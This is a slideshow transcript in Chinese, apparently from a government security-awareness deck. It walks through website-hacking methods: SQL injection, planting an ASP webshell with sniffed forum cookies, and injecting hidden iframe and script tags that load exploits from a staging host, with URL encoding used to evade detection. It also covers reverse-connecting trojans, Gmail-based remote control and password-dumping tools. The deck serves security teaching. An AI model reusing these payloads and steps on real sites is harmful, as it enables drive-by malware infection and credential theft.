Mais conteúdo relacionado
黑站騎士
- 17. 入侵環境條件:
Server端:
網頁是屬於「.asp & .aspx & .php」
網頁程式具有「 SQL Injection 」
網頁應用程式呼叫DB權限太大
DB的資料表沒有鎖定權限
具有「XP_cmdshell」的SQL Server
沒有更改IIS預設路徑或太好猜
網站資料夾權限是「Everyone 完全控制」
Client:
具有「MS06-014」MDAC 漏洞的電腦 或
具有「MS07-017」ani 漏洞的電腦
- 18. 手法探討:
搜尋及尋找具有「 SQL Injection 」
製造遠端遙控型木馬(原生型木馬)
製造「MS06-014、 MS07-017 」漏洞的網頁木馬
利用「 SQL 語法 」新增<iFrame>馬
利用具有IIS 與 SQL Server漏洞上傳ASP網馬
利用ASP網馬褂<iFrame>馬
缺點:
Server端及Client端均須利用很多漏洞,不會這麼剛好
修正「 SQL Injection 」之後就沒效了。
- 21. 模擬案例:JS與論壇掛馬 入侵過程
入侵前準備:
製作 MS04-023、MS06-014、MS07-004 的 Exploits
程式來呼叫木馬。
於 JavaScript 中撰寫 document.write(“<iframe src=
存放 Exploits 的網址 width=0 height=0></iframe>”);
並存檔為 123.js 來呼叫Exploits 。
將 123.js 檔案 進行 變型及加密 來避免被防毒軟體查殺。
最後將MS04-023、MS06-014、MS07-004 的 Exploits
程式及製作好的 123 .js 檔案放置於 192.168.123.101
之跳板網站內 Muma 的目錄中備用。
- 22. 模擬案例:JS與論壇掛馬 入侵過程
入侵中過程:
利用 Sniffer 技巧於Dvbbs 論壇中截獲輸入於該論壇的
Cookie 。
利用該 Cookie 內儲存之帳號與密碼所取得之權限,搭配論
壇上傳程式,將 WebShell (windows.asp)上傳至該台
Web Server的論壇目錄中。
於 www.xyz.com.tw/dvbbs/windows.asp 中確認
WebShell (windows.asp)已經成功傳入。
目的是利用 存放於Dvbbs 論壇中的 WebShell 來將XYZ
公司的網站掛馬。
- 24. 模擬案例:JS與論壇掛馬 入侵過程
入侵中過程:
撰寫掛馬語法 <script language=javascript
src='http://192.168.123.101/muma/123.js'></script>
為避免存放 123.js 的跳板網站URL網址被阻擋,將該網址進行
URL編碼 來逃避偵測。 <script language=javascript
src='http://%31%39%32%2E%31%36%38%2E%31%
32%33%2E%31%30%31%2F%6D%75%6D%61/123.js
' > </script>
利用 WebShell (windows.asp)將語法掛馬後,查看 XYZ公司
網頁HTML原始碼是否有被異動。
- 25. 模擬案例:JS與論壇掛馬 入侵過程
入侵後感染:
當使用者瀏覽 XYZ公司 的網站後,變會觸發HTML
內的掛馬語法
感染流程:
URL編碼的掛馬語法 轉換
跳板網站中的123.js 解析
JS內變型及加密的Exploits 程式網址 還
原
Exploits 程式網址內的木馬程式 植入
- 26. WebShell 流程
駭客 知名的官
方網站
[入侵後上傳]
Webshell (網頁
木馬)
首頁 [掛馬] 將首頁或其他
不知情的一 網頁植入<iFrme>隱
般使用者 藏框架引導到跳版網
站
跳版網站 木馬 掛馬的網頁
- 29. 只是路過打醬油的
• 利用弱點植入木馬(RAR、Word)
• 影片加工(RM、暴風影音II)
• 郵件社交工程(MS06001)
- 35. 手法探討:
製造「彩虹橋」遠端遙控型木馬 (777.exe)
製造MS06-001漏洞工具 (777.jpg 777.wmf)
撰寫呼叫wmf檔案的掛馬網址
http://192.168.123.101/777/777.htm width=0
<iframe src=
height=0></iframe>
使用WINRAR製做具有XSS的自動解壓縮檔案
被害人點選自動解壓縮檔案後植入
反向連結「彩虹橋」木馬可穿越防火牆傳出資料(例如:
port:8080)
缺點:
目標換了WINRAR壓縮/解壓縮工具就沒效了
修補了MS06-001漏洞就不會被觸發。(但攻擊者可換成其
它漏洞)
- 36. 社交工程攻擊模式
Internet
1. 駭客設計攻擊陷
阱程式(如
阱程式 如特殊 4. 受害者開啟電子
受害者開啟電子
開啟 6. 後門程式逆向連
後門程式逆向連
檔案或外部
Word 檔案或外部 郵件 接,向遠端駭客
惡意連結)
惡意連結 報到
將攻擊程式置入
2. 將攻擊程式置入 5. 啟動駭客設計的
電子郵件中 陷阱,將被植入
陷阱,將被植入
後門程式
3. 寄發電子郵件給
特定的目標
交通部管理資訊中心 36
- 42. 3.攻擊使用者與雲端
之間的連線。(例: 1.攻擊雲端本身。(例:DDoS,攻
DDoS,中間人攻擊) 擊設備,退信攻擊,Web攻擊)
2.攻擊雲
端週邊。
(例:
DNS欺騙,
憑證偽冒,
中間人攻
擊)
4.攻擊雲端使用者。(例:社交工程,竊取帳號/密碼)
- 43. 雲端攻擊入侵:
1. 攻擊雲端本身。(例:DDoS,攻擊設備,退信攻擊,Web
攻擊)
2. 攻擊雲端週邊。(例:DNS欺騙,憑證偽冒,中間人攻擊)
3. 攻擊使用者與雲端之間的連線。(例:DDoS,中間人
攻擊)
4. 攻擊雲端使用者。(例:社交工程,竊取帳號/密碼)
5. 建立駭客雲利用合法管道攻擊(例:以合法掩護非法)
- 44. GMail Commander
GMail Commander 是一種檢查信件的軟體,它
允許於檢查信件的同時,接受來自於Gmail信箱所
發送的各種控制指令,來進行遠端遙控。
註:遠端遙控部分需自行於Gmail中撰寫批次檔,
或者呼叫系統的捷徑列。
- 45. GMail Commander
問題點:
發送純文字檔的信,而目標電腦並沒有把信接收下
去的狀態下去控制及觸發對方電腦起床工作了。
參考資料 (原始碼):
http://www.autohotkey.com/forum/topic67120.html
- 46. 單機電腦:挖出電腦密碼
軟體名稱: Windows Password Recovery Tools 工
具組(包含:如下表格)
下載網頁:請利用搜尋引擎搜尋
軟體說明:原理:從系統的暫存檔、登錄檔、cookies、
應用程式的安裝檔、設定檔內將儲存的密碼檔案”顯示”
出來,並非使用暴力破解所計算出來。
註:部分防毒軟體可能會認為這類軟體為木馬或惡意程
式,如果有疑慮請勿使用 。
參考網址: http://briian.com/?p=6910
- 47. 軟體名稱 主要功能:顯示以下軟體的密碼
MessenPass 顯示MSN /Windows Live Messenger, Yahoo
Messenger, ICQ , AOL , Trillian, Miranda, GAIM
Mail PassView 顯示Windows Live Mail, Outlook Express, Microsoft
Outlook 2000/2002/2003/2007, Eudora, Mozilla
Thunderbird, HotMail, Yahoo!, Gmail
IE PassView 顯示 IE 4, IE5, IE6, IE7, IE8 所暫存的密碼
Dialupass Windows 2000, XP, Vista, 2003, 2008, 7的撥號軟體
Network Password Recovery Windows 2000, XP, Vista, 2003, 2008, 7的網芳密碼
SniffPass 側錄 Web/FTP/Email 的密碼
WebBrowserPassView 顯示Internet Explorer (Version 4.0 ~ 8.0), Mozilla
Firefox (All Versions), Google Chrome, Opera 密碼
WirelessKeyView 顯示 WEP/WPA 所儲存在電腦的密碼
Remote Desktop PassView 顯示 遠端桌面軟體 所暫存在電腦的密碼
VNCPassView 顯示 VNC遙控軟體 所儲存在
Registry(HKEY_CURRENT_USER) 的密碼